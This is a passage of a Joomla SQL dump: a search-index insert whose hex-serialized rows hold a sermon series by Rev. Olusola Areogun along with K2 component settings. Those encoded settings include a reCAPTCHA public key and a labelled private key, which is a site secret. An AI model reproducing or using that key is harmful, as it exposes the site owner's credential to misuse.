6573736c792d66726f6d2d6f75722d6661746865722d732d68656172742d30322d30372d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3536223b733a353a22726f757465223b733a3130313a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d35363a646f6e2d742d73657276652d676f642d636172656c6573736c792d66726f6d2d6f75722d6661746865722d732d68656172742d30322d30372d32303137223b733a353a227469746c65223b733a36353a22446f6e277420736572766520476f6420636172656c6573736c79202d2046726f6d206f7572204661746865722773204865617274202830322f30372f3230313729223b733a31313a226465736372697074696f6e223b733a3136323a2220446561726c792042656c6f7665642c204a6572656d696168203438207673203130207361797320e2809c20437572736564206265206865207468617420646f6574682074686520776f726b206f6620746865204c6f72642064656365697466756c6c792c20616e64206375727365642062652068652074686174206b656570657468206261636b206869732073776f72642066726f6d20626c6f6f642ee2809d20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30372d31362031303a31313a3334223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30372d31362031303a31313a3334223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(292, 'index.php?option=com_k2&view=item&id=57', 'index.php?option=com_k2&view=item&id=57:are-you-sendable-from-our-father-s-heart-13-08-2017', 'ARE YOU SENDABLE? From our Father\'s Heart (13/08/2017)', ' FROM THE FATHER’S HEART Dearly Beloved, ARE YOU SENDABLE? There are 3 LABELS God put on you at GOBC 2017; i DIVINE DELEGATES ii GOD’S SPECIAL FORCES iii A SENT MAN. You must carry the consciousness of this from today. God wants me to ask you, are you part of the sendable men? Isaiah 6 verse 8 says “ Also I heard the voice of the Lord, saying, Whom shall I send, and who will go for us? Then said I, Here am I; send me.” ', '2017-10-02 10:07:46', 'fd8a1c3f8d79b879269af9965d7114e2', 1, 1, 1, '*', '2017-08-12 19:04:18', '0000-00-00 00:00:00', '2017-08-12 19:04:18', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223537223b733a353a22616c696173223b733a35313a226172652d796f752d73656e6461626c652d66726f6d2d6f75722d6661746865722d732d68656172742d31332d30382d32303137223b733a373a2273756d6d617279223b733a3436323a223c703e46524f4d2054484520464154484552e28099532048454152543c2f703e0d0a3c703e446561726c792042656c6f7665642c3c6272202f3e41524520594f552053454e4441424c453f205468657265206172652033204c4142454c5320476f6420707574206f6e20796f7520617420474f424320323031373b3c6272202f3e6920444956494e452044454c45474154455320696920474f44e2809953205350454349414c20464f524345532069696920412053454e54204d414e2e203c6272202f3e596f75206d7573742063617272792074686520636f6e7363696f75736e657373206f6620746869732066726f6d20746f6461792e20476f642077616e7473206d6520746f2061736b20796f752c2061726520796f752070617274206f66207468652073656e6461626c65206d656e3f2049736169616820362076657273652038207361797320e2809c20416c736f20492068656172642074686520766f696365206f6620746865204c6f72642c20736179696e672c2057686f6d207368616c6c20492073656e642c20616e642077686f2077696c6c20676f20666f722075733f205468656e207361696420492c204865726520616d20493b2073656e64206d652ee2809d3c2f703e0d0a223b733a343a22626f6479223b733a323738373a220d0a3c703e4d656e2074686174206172652073656e6461626c65206172652074686f7365207468617420686176652068616420616e20656e636f756e746572207769746820746865204c6f72642e204f6e65206f6620746865207468696e677320476f642063616d6520746f20646f20647572696e672074686520636f6e76656e74696f6e206973206e6f74206a75737420746861742048652063616d6520746f20626c657373207573206275742048652063616d6520746f20636f6d6d697373696f6e2075732e20476f642068617320636f6d6520746f207265637275697420746865206361727269657273206f662048697320476c6f72792e2057696c6c20796f752074656c6c20746865204c6f726420746f6461792c204845524520414d20492c2053454e44204d4521204c657420746865204c6f7264206865617220796f752073617920746861742e3c6272202f3e20496e206f757220776f726c6420746f6461792c2074686572652061726520646966666572656e742068617070656e696e677320746861742063616c6c20666f722073656e6461626c65206d656e2e20466f72206578616d706c652c20696e2074686520552e4b2e206f6620746f6461792c20666f722065766572792043687269737469616e20636f6e766572742c2032362043687269737469616e73206c6561766520746865206368757263682e205468617420697320686f77206261642074686520646576696c206861732074616b656e206f76657220696e204575726f70652c20616e6420476f642069732061736b696e672c2057686f207368616c6c20492073656e642c20616e642057686f2077696c6c20676f20666f722075733f204d7568616d6d61642047616464616669207361696420e2809c427920746865206772616365206f6620746865697220676f642c20746865792077696c6c206e6f74206e65656420746f206669726520612062756c6c657420746f2074616b65206f766572204575726f7065202c20696e20746865206e6578742032302d33302079656172732c2074686572652077696c6c206265206d6f7265206d75736c696d73207468616e2043687269737469616e73202ee2809d20476f642069732061736b696e672057484f2043414e2057452053454e443f204e6f742065766572792068756d616e206265696e672069732073656e6461626c65213c6272202f3e4920776173206d696e64696e67206d7920627573696e65737320706c616e6e696e6720746f206265636f6d6520612070726f666573736f72206f6620656c656374726f6e696373207768656e20746865204c6f72642063616d6520746f206d6520616e6420736169642c20e2809c204920616d2073656e64696e6720796f7520746f20496a657368616c616e642c206120746f776e20696e204f73756e2053746174652c204e6967657269612c20746f2072657363756520796f756e672070656f706c652077686f736520616e636573746f727320686176652073746972726564207570206d7920616e676572207468726f756768206576696c2c206f6363756c74696320707261637469636573206f76657220746865207965617273e2809d20616e642049206f626579656420616e642077656e742074686572652e205768656e20776520676f742074686572652c2070656f706c65207765726520776f6e646572696e672c20686f7720636f756c6420796f756e672070656f706c65206c696b6520757320636f6d6520746f2073756368206120706c6163652e204920666163656420736572696f7573206f70706f736974696f6e73207768656e2049207374617274656420746865206d696e69737472792c20627574204920746f6c64207468656d2c20746865206f6e6c792077617920796f752077696c6c2062652061626c6520746f206f766572636f6d65206d6520697320696620796f752063616e206f766572636f6d6520746865206f6e652077686f2073656e74206d652e20412073656e74206d616e206469646ee28099742073656e642068696d73656c662c206865206861732061204d4553534147452c20612053454e4445522c20616e6420444956494e45204241434b494e47206f662057686f2073656e742068696d2e20596f7520617265206e6f206c6f6e67657220616e206f7264696e617279206d616e2065786365707420796f75206d616b6520796f757273656c66206f6e652e3c6272202f3e5468657265206973206120706f776572206f662073656e64696e67207468617420476f642077616e747320796f7520746f20756e6465727374616e642e2049662048652073656e647320796f7520746f2074686520776f726c64206f6620696e74656c6c65637475616c732c2048652077696c6c206769766520796f7520736f6d657468696e6720746865792063616e6e6f7420776974687374616e642e2048652065717569707320796f7520666f7220796f75722061737369676e6d656e742e20536f6d65206f6620796f752c20476f642069732073656e64696e6720796f75206261636b20746f20796f75722066616d696c792e205768656e204920676f7420626f726e20616761696e2c20476f642073656e74206d65206261636b20746f206d792066616d696c7920616e642048652073686f776564206d652074686520726576656c6174696f6e206f66206d792066616d696c7920616e6420686f77207468696e677320686164206265656e20646f6e652077726f6e676c79206265666f7265207468656e2e204920746f6f6b206f7665722c20616e642066726f6d207468617420706f696e74206f6e2c207468696e677320746f6f6b2061206e6577207475726e206265636175736520736f6d656f6e65207761732073656e7420746f206869732066616d696c792e20536f6d65206f6620796f752c20476f642069732073656e64696e6720796f75206261636b20746f20796f75722073746174652c20796f7572206f66666963652c20796f757220766963696e69747920746f20696e666c75656e63652074686520776f726c642061726f756e6420796f7520666f72204a657375732e204d616e792070656f706c6520646f206e6f7420756e6465727374616e642074686520706f776572206f6620612073656e74206d616e20696e20746865206c616e6420776865726520476f642068617320706c61636564207468656d2e20476f6420646f6573206e6f74207265636b6f6e20776974682074686520706f6c6974696369616e7320696e20746865206c616e642c204865207265636b6f6e732077697468204869732070656f706c652077686f6d204865206861732063616c6c656420616e642073656e742e20416e7974696d65207468657265206973206120627265616b646f776e206f66206c617720616e64206f7264657220696e2061206c616e642c207468652077617463686d656e206f76657220746865206c616e6420686176652073746f70706564207761746368696e67206f7665722074686520746f776e2e2049206368616c6c656e676520796f7520746f64617920746f2074616b652075702074686973206d616e646174652e20476f64206973206c6f6f6b696e6720666f7220736f6d65626f64792c20616e6420796f752068617665206265656e2065717569707065642c204e4f5720474f213c6272202f3e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375732e3c6272202f3e476f64e28099732053657276616e742c3c6272202f3e5265762e204f6c75736f6c61204172656f67756e2e3c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d31302d30322031303a30373a3430223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223238223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a35343a2235373a6172652d796f752d73656e6461626c652d66726f6d2d6f75722d6661746865722d732d68656172742d31332d30382d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d2